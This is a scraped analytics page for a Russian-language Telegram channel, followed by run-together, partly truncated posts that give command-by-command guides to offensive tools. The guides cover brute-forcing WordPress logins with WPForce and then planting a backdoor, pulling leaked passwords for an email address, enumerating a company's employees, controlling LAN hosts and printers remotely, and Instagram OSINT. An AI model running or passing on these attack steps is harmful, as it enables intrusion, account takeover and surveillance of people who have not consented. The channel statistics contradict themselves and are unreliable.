CODE RED
Мир глазами программистов; лучшая литература, обучающие статьи, курсы и некоторые полезные лайфхаки. Обратная связь: @encryptedadm
Show more📈 Analytical overview of Telegram channel CODE RED
Channel CODE RED (@coderedcom) in the Russian language segment is an active participant. Currently, the community unites 10 355 subscribers, ranking 9 416 in the Technologies & Applications category and 61 181 in the Russia region.
📊 Audience metrics and dynamics
Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 10 355 subscribers.
According to the latest data from 03 December, 2024, the channel demonstrates stable activity. Although there has been a change in the number of participants by 0 over the last 30 days and by 0 over the last 24 hours, overall reach remains high.
- Verification status: Not verified
- Engagement rate (ER): The average audience engagement rate is 0%. Within the first 24 hours after publication, content typically collects N/A% reactions from the total number of subscribers.
- Post reach: On average, each post receives 0 views. Within the first day, a publication typically gains 0 views.
- Reactions and interaction: The audience actively supports content: the average number of reactions per post is 0.
📝 Description and content policy
The author describes the resource as a platform for expressing subjective opinions:
“Мир глазами программистов; лучшая литература, обучающие статьи, курсы и некоторые полезные лайфхаки.
Обратная связь: @encryptedadm”
Thanks to the high frequency of updates (latest data received on 04 December, 2024), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.
wget https://github.com/katmagic/Shallot/archive/master.zip
◽️unzip master.zip
Переходим в созданную директорию и запускаем сборку командами
◽️cd Shallot-master
◽️./configure
◽️make
Теперь установим непосредственно Tor и lighttpd
◽️apt-get install tor
◽️apt-get install lighttpd
Настройка
На данном этапе нужно сначала получить домен. Делается это командой
◽️./shallot ^codered
Создастся что-то на подобии coderedkpdsto4wxhr.onion и приватный ключ к нему. Вместо codered можно вставить любое название.
Далее запускаем Tor и lighttpd
◽️service tor start
◽️service lighttpd start
В файле /etc/tor/torrc нужно будет добавить такие строки
◽️HiddenServiceDir /var/lib/tor/hidden_service/
◽️HiddenServicePort 80 127.0.0.1:8080
В последней вместо локального ip можно внести внешний. Также желательно добавить эту строку
◽️ExcludeNodes {ru}, {ua}, {be}
Теперь по пути /var/lib/tor/hiddenservice в файл hostname нужно вписать полученный ранее домен, а в privatekey - приватный ключ.
Остается только в файле /etc/lighttpd/lighttpd.conf поменять параметры на подобные
◽️server.document-root = "/var/www/"
◽️server.error-handler-404 = "/404.html"
◽️server.tag = "Ваше значение"
◽️server.port = 8080 $HTTP["remoteip"] !~ "127.0.0.1" { url.access-deny = ( "" ) }
◽️server.dir-listing = "disable"
Почти готово, нужно только создать вебстраницы index.html и 404.html в папке /var/www/, соответственно. Теперь при переходе по сгенерированному ранее адресу будет открываться созданный сайт. Стоит добавить, что в lighttpd можно уставить множество дополнительных модулей, тем самым модифицировать сайт.
#kali #TORapt-get update –y && apt-get upgrade –y && apt-get dist-upgrade
Устанавливаем Python 3
◽️apt-get install python3 python3-pip
Скачиваем репозиторий
◽️git clone https://github.com/xdavidhu/lanGhost
Переходим в директорию и запускаем установщик
◽️cd LanGhost/
◽️./setup.py
Настройка
Далее надо настроить lanGhost в 4 этапа. В первом надо просто согласиться. Во втором вписать API созданного Телеграм бота, и соответственно в третьем вписать проверочный код, который придет сразу же после второго шага. На четвертом этапе достаточно также все оставить по стандарту.
Готово! Теперь прописывая команды боту, вы сможете управлять узлами в локальной сети, к которой подключены.
#kali127.0.0.1 с портом 9050 и типом Socks 5.
Готово! Теперь абсолютно весь интернет-трафик системы проходит сквозь сеть Tor.git clone https://github.com/Moham3dRiahi/Th3inspector
Переходим в директорию с The Inspector, ставим права на установщик и запускаем его
◽️cd Th3inspector
◽️chmod +x install.sh && ./install.sh
Использование
Запускаем The Inspector командой
◽️perl Th3inspector.pl
Теперь можно выбрать интересующую функцию, вписав её номер. К примеру для получения информации о сайте вводим 1 и потом домен. Как итог получаем списком данные геолокации хостера, ip и т.д.
#kali #OSINTpkg update upgrade -y
Далее установим git
◽️pkg install git
И скачаем само решение
◽️git clone https://github.com/MrAlpha786/termux-fingerprint-lock
Настройка
Переходим в директорию с инструментами и ставим права на исполняемый файл
◽️cd termux-fingerprint-lock
◽️chmod u+x setup
Далее запускаем его
◽️bash setup
В процессе выполнения программы попросит прислонить палец к сенсору. Готово. Теперь при последующем входе в Термукс, для появления данных на экране нужно будет сначала просканировать отпечаток.
#termux #безопасностьgit clone https://github.com/thewhiteh4t/pwnedOrNot.git
Далее устанавливаем необходимый модуль Python
◽️pip install cfscrape
Готово. Для Termux установим для начала Python и Git
◽️pkg install python2
◽️pkg install git
Далее необходимые модули
◽️pip2 install requests
◽️pip2 install cfscrape
И в итоге скачаем репозиторий с github
◽️git clone https://github.com/thewhiteh4t/pwnedOrNot.git
Использование
PwnedOrNot максимально прост в использовании. Для начала процесса проверки запускаем скрипт командой
◽️python pwnedornot.py
Это как для Kali, так и для Termux. Далее остается только ввести почту и ждать завершения процесса. Если поиск пройдет удачно, в терминале появится список паролей, которые могут быть связаны со сканируемым адресом.
#kali #хакингgit clone https://github.com/0x09AL/raven.git
Переходим в директорию и запускаем установщик
cd raven
sh setup.sh
Использование
Для вывода справки нужно вписать
python raven.py
Из представленной информации можно узнать, что минимальные данные, которые нужно знать о целевой компании - это её название и инициалы страны расположения.
То есть если мы хотим узнать о сотрудниках корпорации "Evil", которая находится в России, нужно будет вписать команду
python raven.py -c 'Evil' -s ru
После завершения работы скрипта в терминале появится список всех найденных сотрудников.git clone https://github.com/n00py/WPForce.git
Также потребуется установить Python.
Использование
Запускаем атаку на сайт командой
◽python wpforce.py -i <список логинов> -w <список паролей> -u <ссылка>
В случае успеха в консоль выведется логин и пароль. Далее на сайт можно подгрузить бекдор прописав
◽python yertle.py -u <логин> -p <пароль> -t <ссылка> --interactive
Готово, тестовый веб ресурс взломан, а мы закрепились в системе и можем управлять каталогами, БД и т.д.$ pkg install -y git
$ git clone https://github.com/th3unkn0n/osi.ig.git && cd osi.ig
$ chmod +x install.sh && ./install.sh
Использование
$ python3 main.py -u username
Так же, Osi.ig позволяет собрать статистику всех, и наиболее часто используемых хештегов. Дополнительно, можно проанализировать все метки местоположений, временные метки, подписи, комментарии и ссылки на изображения.
📌https://github.com/th3unkn0n/osi.ig
#OSINTpip install colorama pysnmp win_unicode_console
Далее потребуется установить несколько модулей
◽apt-get install ghostscript imagemagick
И скачать сам репозиторий с github
◽git clone https://github.com/RUB-NDS/PRET
Использование
Остается только вписать ip адрес на котором располагается целевой принтер и выбрать скриптовый язык
◽./pret.py 192.168.0.1 ps
Как итог установится сопряжение и атакующий сможет манипулировать устройством удаленно.